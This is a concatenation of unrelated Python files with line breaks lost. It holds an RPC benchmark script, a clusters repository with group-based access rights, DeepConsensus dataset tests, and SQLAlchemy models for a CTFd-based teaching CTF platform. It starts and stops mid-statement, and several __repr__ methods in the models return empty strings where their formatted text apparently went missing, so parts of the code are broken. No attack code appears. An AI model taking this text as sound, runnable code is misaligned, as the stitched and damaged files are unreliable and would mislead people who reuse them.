np.ndarray) assert res.shape == (n_timesteps,) assert len(np.unique(np.round(res, 5))) == period_length assert np.all(abs(res) <= amplitude) class ChessProtocol(dict): def __init__(self, cmd, obj): dict.__init__(self) self.cmd = cmd self.object = obj examples/benchmark.py # -*- coding: utf-8 -*- import time import sys import argparse sys.path.append('../') from multiprocessing import Process, Value from tornado import ioloop, gen from torpc import RPCServer, RPCClient from example_utils import log_initialize def rpc_server_entry(rpc_address): log_initialize() server = RPCServer(rpc_address) @server.service.register() def sum(x, y): return x + y server.start() ioloop.IOLoop.instance().start() def rpc_client_entry(rpc_address, num_of_loop, time_start, time_stop): log_initialize() rpc_client = RPCClient(rpc_address) run_call_server(rpc_client, num_of_loop, time_start, time_stop) ioloop.IOLoop.instance().start() @gen.coroutine def run_call_server(rpc_client, num_of_loop, time_start, time_stop): # The time of first client process beginning if time_start.value == 0: time_start.value = time.time() for i in range(num_of_loop): # ret = yield gen.with_timeout(time.time() + 10, rpc_client.call("sum", 1, 2)) ret = yield rpc_client.call("sum", 1, 2) # The time of last client process finished time_now = time.time() if time_now > time_stop.value: time_stop.value = time_now ioloop.IOLoop.instance().stop() ARGS = argparse.ArgumentParser(description="ToRPC RPC benchmark.") ARGS.add_argument( '-c', action="store", dest='client', default=1, help='Number of rpc client.') ARGS.add_argument( '-n', action="store", dest='number', default=10000, help='Number of loop for per client.') ARGS.add_argument( '-host', action="store", dest='host', default='127.0.0.1', help='Host name. (default 127.0.0.1)') ARGS.add_argument( '-p', action="store", dest='port', default=5000, type=int, help='Port number (default 5000)') ARGS.add_argument( '-u', action="store", dest='unix_path', default=False, help='Use unix domain socket.') if __name__ == '__main__': args = ARGS.parse_args() if ':' in args.host: args.host, port = args.host.split(':', 1) args.port = int(port) if args.unix_path: rpc_address = args.unix_path else: rpc_address = (args.host, args.port) # print(rpc_address) num_of_loop = int(args.number) num_of_client = int(args.client) time_start = Value('d', 0) time_stop = Value('d', 0) sp = Process(target=rpc_server_entry, args=(rpc_address,)) sp.start() client_processes = [] for i in range(num_of_client): cp = Process(target=rpc_client_entry, args=(rpc_address, num_of_loop, time_start, time_stop)) client_processes.append(cp) for cp in client_processes: cp.start() for cp in client_processes: cp.join() total_time_value = time_stop.value - time_start.value print('Throughput: %d [#/sec]' % (num_of_loop * num_of_client / total_time_value)) sp.terminate()import logging from typing import Dict, Iterable, List, Optional import psycopg2 import sqlalchemy as sa from aiopg.sa import connection from models_library.clusters import ( CLUSTER_ADMIN_RIGHTS, CLUSTER_MANAGER_RIGHTS, CLUSTER_NO_RIGHTS, CLUSTER_USER_RIGHTS, Cluster, ClusterAccessRights, ClusterID, ) from models_library.users import UserID from pydantic.types import PositiveInt from simcore_postgres_database.models.cluster_to_groups import cluster_to_groups from simcore_postgres_database.models.clusters import clusters from simcore_postgres_database.models.groups import GroupType, groups, user_to_groups from simcore_postgres_database.models.users import users from sqlalchemy.dialects.postgresql import insert as pg_insert from ....core.errors import ( ClusterAccessForbiddenError, ClusterInvalidOperationError, ClusterNotFoundError, ) from ....models.schemas.clusters import ClusterCreate, ClusterPatch from ....utils.db import to_clusters_db from ._base import BaseRepository logger = logging.getLogger(__name__) async def _clusters_from_cluster_ids( conn: connection.SAConnection, cluster_ids: Iterable[PositiveInt], offset: int = 0, limit: Optional[int] = None, ) -> List[Cluster]: cluster_id_to_cluster: Dict[PositiveInt, Cluster] = {} async for row in conn.execute( sa.select( [ clusters, cluster_to_groups.c.gid, cluster_to_groups.c.read, cluster_to_groups.c.write, cluster_to_groups.c.delete, ] ) .select_from( clusters.join( cluster_to_groups, clusters.c.id == cluster_to_groups.c.cluster_id, ) ) .where(clusters.c.id.in_(cluster_ids)) .offset(offset) .limit(limit) ): cluster_access_rights = { row[cluster_to_groups.c.gid]: ClusterAccessRights( **{ "read": row[cluster_to_groups.c.read], "write": row[cluster_to_groups.c.write], "delete": row[cluster_to_groups.c.delete], } ) } cluster_id = row[clusters.c.id] if cluster_id not in cluster_id_to_cluster: cluster_id_to_cluster[cluster_id] = Cluster( id=cluster_id, name=row[clusters.c.name], description=row[clusters.c.description], type=row[clusters.c.type], owner=row[clusters.c.owner], endpoint=row[clusters.c.endpoint], authentication=row[clusters.c.authentication], thumbnail=row[clusters.c.thumbnail], access_rights=cluster_access_rights, ) else: cluster_id_to_cluster[cluster_id].access_rights.update( cluster_access_rights ) return list(cluster_id_to_cluster.values()) async def _compute_user_access_rights( conn: connection.SAConnection, user_id: UserID, cluster: Cluster ) -> ClusterAccessRights: result = await conn.execute( sa.select([user_to_groups.c.gid, groups.c.type]) .where(user_to_groups.c.uid == user_id) .order_by(groups.c.type) .join(groups) ) user_groups = await result.fetchall() # get the primary group first, as it has precedence if primary_group_row := next( filter(lambda ugrp: ugrp[1] == GroupType.PRIMARY, user_groups), None ): if primary_grp_rights := cluster.access_rights.get(primary_group_row.gid): return primary_grp_rights solved_rights = CLUSTER_NO_RIGHTS.dict() for group_row in filter(lambda ugrp: ugrp[1] != GroupType.PRIMARY, user_groups): grp_access = cluster.access_rights.get(group_row.gid, CLUSTER_NO_RIGHTS).dict() for operation in ["read", "write", "delete"]: solved_rights[operation] |= grp_access[operation] return ClusterAccessRights(**solved_rights) class ClustersRepository(BaseRepository): async def create_cluster(self, user_id, new_cluster: ClusterCreate) -> Cluster: async with self.db_engine.acquire() as conn: user_primary_gid = await conn.scalar( sa.select([users.c.primary_gid]).where(users.c.id == user_id) ) new_cluster.owner = user_primary_gid new_cluster_id = await conn.scalar( sa.insert( clusters, values=to_clusters_db(new_cluster, only_update=False) ).returning(clusters.c.id) ) assert new_cluster_id # nosec return await self.get_cluster(user_id, new_cluster_id) async def list_clusters(self, user_id: UserID) -> List[Cluster]: async with self.db_engine.acquire() as conn: result = await conn.execute( sa.select([clusters.c.id], distinct=True) .where( cluster_to_groups.c.gid.in_( # get the groups of the user where he/she has read access sa.select([groups.c.gid]) .where((user_to_groups.c.uid == user_id)) .order_by(groups.c.gid) .select_from(groups.join(user_to_groups)) ) & cluster_to_groups.c.read ) .join(cluster_to_groups) ) cluster_ids = await result.fetchall() return await _clusters_from_cluster_ids(conn, {c.id for c in cluster_ids}) async def get_cluster(self, user_id: UserID, cluster_id: ClusterID) -> Cluster: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{access_rights=}", ) if not access_rights.read: raise ClusterAccessForbiddenError(cluster_id=cluster_id) return the_cluster async def update_cluster( # pylint: disable=too-many-branches self, user_id: UserID, cluster_id: ClusterID, updated_cluster: ClusterPatch ) -> Cluster: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if len(clusters_list) != 1: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] this_user_access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{this_user_access_rights=}", ) if not this_user_access_rights.write: raise ClusterAccessForbiddenError(cluster_id=cluster_id) if updated_cluster.owner and updated_cluster.owner != the_cluster.owner: # if the user wants to change the owner, we need more rights here if this_user_access_rights != CLUSTER_ADMIN_RIGHTS: raise ClusterAccessForbiddenError(cluster_id=cluster_id) # ensure the new owner has admin rights, too if not updated_cluster.access_rights: updated_cluster.access_rights = { updated_cluster.owner: CLUSTER_ADMIN_RIGHTS } else: updated_cluster.access_rights[ updated_cluster.owner ] = CLUSTER_ADMIN_RIGHTS # resolve access rights changes resolved_access_rights = the_cluster.access_rights if updated_cluster.access_rights: # if the user is a manager he/she may ONLY add/remove users if this_user_access_rights == CLUSTER_MANAGER_RIGHTS: for grp, rights in updated_cluster.access_rights.items(): if grp == the_cluster.owner or rights not in [ CLUSTER_USER_RIGHTS, CLUSTER_NO_RIGHTS, ]: # a manager cannot change the owner abilities or create # managers/admins raise ClusterAccessForbiddenError(cluster_id=cluster_id) resolved_access_rights.update(updated_cluster.access_rights) # ensure the user is not trying to mess around owner admin rights if ( resolved_access_rights.setdefault( the_cluster.owner, CLUSTER_ADMIN_RIGHTS ) != CLUSTER_ADMIN_RIGHTS ): raise ClusterAccessForbiddenError(cluster_id=cluster_id) # ok we can update now try: await conn.execute( sa.update(clusters) .where(clusters.c.id == the_cluster.id) .values(to_clusters_db(updated_cluster, only_update=True)) ) except psycopg2.DatabaseError as e: raise ClusterInvalidOperationError(cluster_id=cluster_id) from e # upsert the rights if updated_cluster.access_rights: for grp, rights in resolved_access_rights.items(): insert_stmt = pg_insert(cluster_to_groups).values( **rights.dict(by_alias=True), gid=grp, cluster_id=the_cluster.id ) on_update_stmt = insert_stmt.on_conflict_do_update( index_elements=[ cluster_to_groups.c.cluster_id, cluster_to_groups.c.gid, ], set_=rights.dict(by_alias=True), ) await conn.execute(on_update_stmt) clusters_list: List[Cluster] = await _clusters_from_cluster_ids( conn, {cluster_id} ) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] return the_cluster async def delete_cluster(self, user_id: UserID, cluster_id: ClusterID) -> None: async with self.db_engine.acquire() as conn: clusters_list = await _clusters_from_cluster_ids(conn, {cluster_id}) if not clusters_list: raise ClusterNotFoundError(cluster_id=cluster_id) the_cluster = clusters_list[0] access_rights = await _compute_user_access_rights( conn, user_id, the_cluster ) logger.debug( "found cluster in DB: %s, with computed %s", f"{the_cluster=}", f"{access_rights=}", ) if not access_rights.delete: raise ClusterAccessForbiddenError(cluster_id=cluster_id) await conn.execute(sa.delete(clusters).where(clusters.c.id == cluster_id)) # Copyright (c) 2021, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, # are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of Google Inc. nor the names of its contributors # may be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON # ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Tests for deepconsensus.models.data_providers.""" import json from typing import Any, Dict, Tuple from absl.testing import absltest from absl.testing import parameterized import numpy as np import tensorflow as tf from deepconsensus.models import data_providers from deepconsensus.models import model_configs from deepconsensus.models import model_utils from deepconsensus.utils import dc_constants from deepconsensus.utils import test_utils def get_test_dataset(inference: bool) -> Tuple[str, Dict[str, Any]]: """Loads inference or training dataset and json summary.""" if inference: dataset_path = 'human_1m/tf_examples/inference/*.tfrecord.gz' summary_json = 'human_1m/tf_examples/summary/summary.inference.json' size_key = 'n_examples_inference' else: dataset_path = 'human_1m/tf_examples/train/*.tfrecord.gz' summary_json = 'human_1m/tf_examples/summary/summary.training.json' size_key = 'n_examples_train' file_pattern = test_utils.deepconsensus_testdata(dataset_path) summary_json_path = test_utils.deepconsensus_testdata(summary_json) summary = json.load(tf.io.gfile.GFile(summary_json_path)) return file_pattern, summary[size_key] class DataProvidersTest(parameterized.TestCase): @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='multiple epochs train', num_epochs=5, batch_size=1, inference=False, ), dict( testcase_name='batch size does not evenly divide # examples train', num_epochs=5, batch_size=10, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), dict( testcase_name='multiple epochs inference', num_epochs=5, batch_size=1, inference=True, ), dict( testcase_name='batch size does not evenly divide # examples inference', num_epochs=5, batch_size=10, inference=True, ), ) def test_get_dataset(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" # Dataset sizes computed using gqui. Currently, eval set is empty because # the testdata only contains one molecule, which is added to training set # based on end position. file_pattern, dataset_size = get_test_dataset(inference) params = model_configs.get_config('transformer+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, drop_remainder=False, inference=inference) total = 0 for subreads, label in dataset.as_numpy_iterator(): # Last batch may contain fewer examples. if not inference: self.assertLen(subreads, len(label)) self.assertLessEqual(len(subreads), batch_size) total += len(subreads) self.assertEqual(total, num_epochs * dataset_size) @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='multiple epochs train', num_epochs=5, batch_size=1, inference=False, ), dict( testcase_name='batch size does not evenly divide # examples train', num_epochs=5, batch_size=10, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), dict( testcase_name='multiple epochs inference', num_epochs=5, batch_size=1, inference=True, ), dict( testcase_name='batch size does not evenly divide # examples inference', num_epochs=5, batch_size=10, inference=True, ), ) def test_get_dataset_with_metadata(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" # Dataset sizes computed using gqui. Currently, eval set is empty because # the testdata only contains one molecule, which is added to training set # based on end position. file_pattern, dataset_size = get_test_dataset(inference) params = model_configs.get_config('transformer+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, drop_remainder=False, inference=inference, keep_metadata=True) total = 0 for subreads, label, num_passes in dataset.as_numpy_iterator(): # Last batch may contain fewer examples. if not inference: self.assertLen(subreads, len(label)) self.assertLessEqual(len(subreads), batch_size) # Sanity check the values in the num_passes array. self.assertTrue(tf.reduce_all(num_passes <= 20)) self.assertTrue(tf.reduce_all(num_passes > 0)) total += len(subreads) self.assertEqual(total, num_epochs * dataset_size) @parameterized.named_parameters( dict( testcase_name='batch size evenly divides # examples train', num_epochs=1, batch_size=1, inference=False, ), dict( testcase_name='batch size evenly divides # examples inference', num_epochs=1, batch_size=1, inference=True, ), ) def test_get_dataset_with_pw_ip(self, num_epochs, batch_size, inference): """Checks that batches are of expected size and all examples yielded.""" file_pattern, _ = get_test_dataset(inference) params = model_configs.get_config('transformer_learn_values+test') model_utils.modify_params(params) dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=num_epochs, batch_size=batch_size, params=params, inference=inference) check_not_empty = False for subreads, _ in dataset.as_numpy_iterator(): check_not_empty = True base_indices, pw_indices, ip_indices, strand_indices, ccs_indices, sn_indices = data_providers.get_indices( params.max_passes) base_rows = subreads[:, slice(*base_indices), :, :] pw_rows = subreads[:, slice(*pw_indices), :, :] ip_rows = subreads[:, slice(*ip_indices), :, :] strand_rows = subreads[:, slice(*strand_indices), :, :] ccs_rows = subreads[:, slice(*ccs_indices), :, :] sn_rows = subreads[:, slice(*sn_indices), :, :] self.assertNotEmpty(base_rows) self.assertNotEmpty(pw_rows) self.assertNotEmpty(ip_rows) self.assertNotEmpty(strand_rows) self.assertNotEmpty(ccs_rows) self.assertNotEmpty(sn_rows) self.assertTrue(np.all(base_rows < params.vocab_size)) self.assertTrue(np.all(ip_rows <= dc_constants.IP_MAX)) self.assertTrue(np.all(pw_rows <= dc_constants.PW_MAX)) self.assertTrue(check_not_empty) # Used to fail on empty dataset. @parameterized.named_parameters( dict( testcase_name='limit number of examples train', limit=42, inference=False, ), dict( testcase_name='limit set to size greater than dataset train', limit=int(1e6), inference=False, ), dict( testcase_name='limit number of examples inference', limit=42, inference=True, ), dict( testcase_name='limit set to size greater than dataset inference', limit=int(1e6), inference=True, ), ) def test_dataset_with_limit_option(self, limit, inference): """Checks that batches are of expected size and all examples yielded.""" file_pattern, _ = get_test_dataset(inference) params = model_configs.get_config('transformer_learn_values+test') model_utils.modify_params(params) # Fetch the complete dataset. full_dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=1, batch_size=1, params=params, inference=inference, ) full_dataset_size = sum(1 for record in full_dataset) # Fetch dataset with the limit flag. dataset = data_providers.get_dataset( file_pattern=file_pattern, num_epochs=1, batch_size=1, params=params, limit=limit, inference=inference) limit_dataset_size = sum(1 for record in dataset) self.assertEqual(min(limit, full_dataset_size), limit_dataset_size) def test_remove_internal_gaps_and_shift(self): label, expected = (' GGGCGAG ACATA ACATA ATA ATA ', 'GGGCGAGACATAACATAATAATA ') label = [float(dc_constants.VOCAB.index(x)) for x in label] label = tf.expand_dims(tf.constant(label), axis=0) shifted = data_providers.remove_internal_gaps_and_shift(label) result = ''.join([dc_constants.VOCAB[int(x)] for x in shifted]) self.assertEqual(result, expected) if __name__ == '__main__': absltest.main() ldecoster/Plateforme-CTF0 import datetime from collections import defaultdict from flask_marshmallow import Marshmallow from flask_sqlalchemy import SQLAlchemy from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import column_property, validates db = SQLAlchemy() ma = Marshmallow() def get_class_by_tablename(tablename): """Return class reference mapped to table. https://stackoverflow.com/a/23754464 :param tablename: String with name of table. :return: Class reference or None. """ for c in db.Model._decl_class_registry.values(): if hasattr(c, "__tablename__") and c.__tablename__ == tablename: return c return None class Votes(db.Model): __tablename__ = "votes" id = db.Column(db.Integer, primary_key=True) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) challenge_id = db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE")) value = db.Column(db.Boolean, default=False) user = db.relationship("Users", foreign_keys="Votes.user_id", lazy="select") class Badges(db.Model): __tablename__ = "badges" id = db.Column(db.Integer, primary_key=True) description = db.Column(db.Text) name = db.Column(db.String(80)) tag_id = db.Column(db.Integer, db.ForeignKey("tags.id", ondelete="CASCADE"), nullable=False) def __init__(self, *args, **kwargs): super(Badges, self).__init__(**kwargs) class Notifications(db.Model): __tablename__ = "notifications" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.Text) content = db.Column(db.Text) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) user_id = db.Column(db.Integer, db.ForeignKey("users.id")) user = db.relationship("Users", foreign_keys="Notifications.user_id", lazy="select") @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content)) def __init__(self, *args, **kwargs): super(Notifications, self).__init__(**kwargs) class Pages(db.Model): __tablename__ = "pages" id = db.Column(db.Integer, primary_key=True) title = db.Column(db.String(80)) route = db.Column(db.String(128), unique=True) content = db.Column(db.Text) draft = db.Column(db.Boolean) hidden = db.Column(db.Boolean) auth_required = db.Column(db.Boolean) # TODO: Use hidden attribute files = db.relationship("PageFiles", backref="page") def __init__(self, *args, **kwargs): super(Pages, self).__init__(**kwargs) def __repr__(self): return "".format(self.route) class Challenges(db.Model): __tablename__ = "challenges" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(80)) description = db.Column(db.Text) max_attempts = db.Column(db.Integer, default=0) type = db.Column(db.String(80)) state = db.Column(db.String(80), nullable=False, default="visible") requirements = db.Column(db.JSON) author_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) files = db.relationship("ChallengeFiles", backref="challenge") resources = db.relationship("Resources", backref="challenge") tags = db.relationship("Tags", secondary="tag_challenge") flags = db.relationship("Flags", backref="challenge") comments = db.relationship("ChallengeComments", backref="challenge") author = db.relationship("Users", foreign_keys="Challenges.author_id", lazy="select") class alt_defaultdict(defaultdict): """ This slightly modified defaultdict is intended to allow SQLAlchemy to not fail when querying Challenges that contain a missing challenge type. e.g. Challenges.query.all() should not fail if `type` is `a_missing_type` """ def __missing__(self, key): return self["standard"] __mapper_args__ = { "polymorphic_identity": "standard", "polymorphic_on": type, "_polymorphic_map": alt_defaultdict(), } @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.description)) def __init__(self, *args, **kwargs): super(Challenges, self).__init__(**kwargs) def __repr__(self): return "" % self.name class Resources(db.Model): __tablename__ = "resources" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) content = db.Column(db.Text) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} @property def name(self): return "Resource {id}".format(id=self.id) @property def category(self): return self.__tablename__ @property def description(self): return "Resource for {name}".format(name=self.challenge.name) @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content)) def __init__(self, *args, **kwargs): super(Resources, self).__init__(**kwargs) def __repr__(self): return "" % self.content class Tags(db.Model): __tablename__ = "tags" id = db.Column(db.Integer, primary_key=True) value = db.Column(db.String(80)) exercise = db.Column(db.Boolean) challenges = db.relationship("Challenges", secondary="tag_challenge") def __init__(self, *args, **kwargs): super(Tags, self).__init__(**kwargs) class TagChallenge(db.Model): __tablename__ = "tag_challenge" challenge_id = db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE"), primary_key=True, nullable=False) tag_id = db.Column(db.Integer, db.ForeignKey("tags.id", ondelete="CASCADE"), primary_key=True, nullable=False) def __init__(self, *args, **kwargs): super(TagChallenge, self).__init__(**kwargs) class Files(db.Model): __tablename__ = "files" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") location = db.Column(db.Text) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} def __init__(self, *args, **kwargs): super(Files, self).__init__(**kwargs) def __repr__(self): return "".format( type=self.type, location=self.location ) class ChallengeFiles(Files): __mapper_args__ = {"polymorphic_identity": "challenge"} challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) def __init__(self, *args, **kwargs): super(ChallengeFiles, self).__init__(**kwargs) class PageFiles(Files): __mapper_args__ = {"polymorphic_identity": "page"} page_id = db.Column(db.Integer, db.ForeignKey("pages.id")) def __init__(self, *args, **kwargs): super(PageFiles, self).__init__(**kwargs) class Flags(db.Model): __tablename__ = "flags" id = db.Column(db.Integer, primary_key=True) challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) type = db.Column(db.String(80)) content = db.Column(db.Text) data = db.Column(db.Text) __mapper_args__ = {"polymorphic_on": type} def __init__(self, *args, **kwargs): super(Flags, self).__init__(**kwargs) def __repr__(self): return "".format(self.content, self.challenge_id) class Users(db.Model): __tablename__ = "users" __table_args__ = (db.UniqueConstraint("id"), {}) # Core attributes id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(128), unique=True) password = db.Column(db.String(128)) email = db.Column(db.String(128), unique=True) type = db.Column(db.String(80)) secret = db.Column(db.String(128)) # Supplementary attributes website = db.Column(db.String(128)) country = db.Column(db.String(32)) school = db.Column(db.String(32)) cursus = db.Column(db.String(128)) specialisation = db.Column(db.String(128)) bracket = db.Column(db.String(32)) hidden = db.Column(db.Boolean, default=False) banned = db.Column(db.Boolean, default=False) verified = db.Column(db.Boolean, default=False) field_entries = db.relationship( "UserFieldEntries", foreign_keys="UserFieldEntries.user_id", lazy="joined" ) created = db.Column(db.DateTime, default=datetime.datetime.utcnow) __mapper_args__ = {"polymorphic_identity": "user", "polymorphic_on": type} def __init__(self, **kwargs): super(Users, self).__init__(**kwargs) @validates("password") def validate_password(self, key, plaintext): from CTFd.utils.crypto import hash_password return hash_password(str(plaintext)) @hybrid_property def account_id(self): return self.id @hybrid_property def account(self): return self @property def fields(self): return self.get_fields(admin=False) @property def solves(self): return self.get_solves() @property def fails(self): return self.get_fails() def get_fields(self, admin=False): if admin: return self.field_entries return [ entry for entry in self.field_entries if entry.field.public and entry.value ] def get_solves(self): solves = Solves.query.filter_by(user_id=self.id) return solves.all() def get_fails(self): fails = Fails.query.filter_by(user_id=self.id) return fails.all() class Admins(Users): __tablename__ = "admins" __mapper_args__ = {"polymorphic_identity": "admin"} class Contributors(Users): __tablename__ = "contributors" __mapper_args__ = {"polymorphic_identity": "contributor"} class Teachers(Users): __tablename__ = "teachers" __mapper_args__ = {"polymorphic_identity": "teacher"} class Submissions(db.Model): __tablename__ = "submissions" id = db.Column(db.Integer, primary_key=True) challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) ip = db.Column(db.String(46)) provided = db.Column(db.Text) type = db.Column(db.String(32)) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) # Relationships user = db.relationship("Users", foreign_keys="Submissions.user_id", lazy="select") challenge = db.relationship( "Challenges", foreign_keys="Submissions.challenge_id", lazy="select" ) __mapper_args__ = {"polymorphic_on": type} @hybrid_property def account_id(self): return self.user_id @hybrid_property def account(self): return self.user @staticmethod def get_child(type): child_classes = { x.polymorphic_identity: x.class_ for x in Submissions.__mapper__.self_and_descendants } return child_classes[type] def __repr__(self): return f"" class Solves(Submissions): __tablename__ = "solves" __table_args__ = ( db.UniqueConstraint("challenge_id", "user_id"), {}, ) id = db.Column( None, db.ForeignKey("submissions.id", ondelete="CASCADE"), primary_key=True ) challenge_id = column_property( db.Column(db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE")), Submissions.challenge_id, ) user_id = column_property( db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")), Submissions.user_id, ) user = db.relationship("Users", foreign_keys="Solves.user_id", lazy="select") challenge = db.relationship( "Challenges", foreign_keys="Solves.challenge_id", lazy="select" ) __mapper_args__ = {"polymorphic_identity": "correct"} class Fails(Submissions): __mapper_args__ = {"polymorphic_identity": "incorrect"} class Tracking(db.Model): __tablename__ = "tracking" id = db.Column(db.Integer, primary_key=True) ip = db.Column(db.String(46)) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) user = db.relationship("Users", foreign_keys="Tracking.user_id", lazy="select") def __init__(self, *args, **kwargs): super(Tracking, self).__init__(**kwargs) def __repr__(self): return "" % self.ip class Configs(db.Model): __tablename__ = "config" id = db.Column(db.Integer, primary_key=True) key = db.Column(db.Text) value = db.Column(db.Text) def __init__(self, *args, **kwargs): super(Configs, self).__init__(**kwargs) class Tokens(db.Model): __tablename__ = "tokens" id = db.Column(db.Integer, primary_key=True) user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) created = db.Column(db.DateTime, default=datetime.datetime.utcnow) expiration = db.Column( db.DateTime, default=lambda: datetime.datetime.utcnow() + datetime.timedelta(days=30), ) value = db.Column(db.String(128), unique=True) user = db.relationship("Users", foreign_keys="Tokens.user_id", lazy="select") def __init__(self, *args, **kwargs): super(Tokens, self).__init__(**kwargs) def __repr__(self): return "" % self.id class UserTokens(Tokens): __mapper_args__ = {"polymorphic_identity": "user"} class Comments(db.Model): __tablename__ = "comments" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") content = db.Column(db.Text) date = db.Column(db.DateTime, default=datetime.datetime.utcnow) author_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) author = db.relationship("Users", foreign_keys="Comments.author_id", lazy="select") @property def html(self): from CTFd.utils.config.pages import build_html from CTFd.utils.helpers import markup return markup(build_html(self.content, sanitize=True)) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} class ChallengeComments(Comments): __mapper_args__ = {"polymorphic_identity": "challenge"} challenge_id = db.Column( db.Integer, db.ForeignKey("challenges.id", ondelete="CASCADE") ) class UserComments(Comments): __mapper_args__ = {"polymorphic_identity": "user"} user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) class PageComments(Comments): __mapper_args__ = {"polymorphic_identity": "page"} page_id = db.Column(db.Integer, db.ForeignKey("pages.id", ondelete="CASCADE")) class Fields(db.Model): __tablename__ = "fields" id = db.Column(db.Integer, primary_key=True) name = db.Column(db.Text) type = db.Column(db.String(80), default="standard") field_type = db.Column(db.String(80)) description = db.Column(db.Text) required = db.Column(db.Boolean, default=False) public = db.Column(db.Boolean, default=False) editable = db.Column(db.Boolean, default=False) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} class UserFields(Fields): __mapper_args__ = {"polymorphic_identity": "user"} class FieldEntries(db.Model): __tablename__ = "field_entries" id = db.Column(db.Integer, primary_key=True) type = db.Column(db.String(80), default="standard") value = db.Column(db.JSON) field_id = db.Column(db.Integer, db.ForeignKey("fields.id", ondelete="CASCADE")) field = db.relationship( "Fields", foreign_keys="FieldEntries.field_id", lazy="joined" ) __mapper_args__ = {"polymorphic_identity": "standard", "polymorphic_on": type} @hybrid_property def name(self): return self.field.name @hybrid_property def description(self): return self.field.description class UserFieldEntries(FieldEntries): __mapper_args__ = {"polymorphic_identity": "user"} user_id = db.Column(db.Integer, db.ForeignKey("users.id", ondelete="CASCADE")) user = db.relationship("Users", 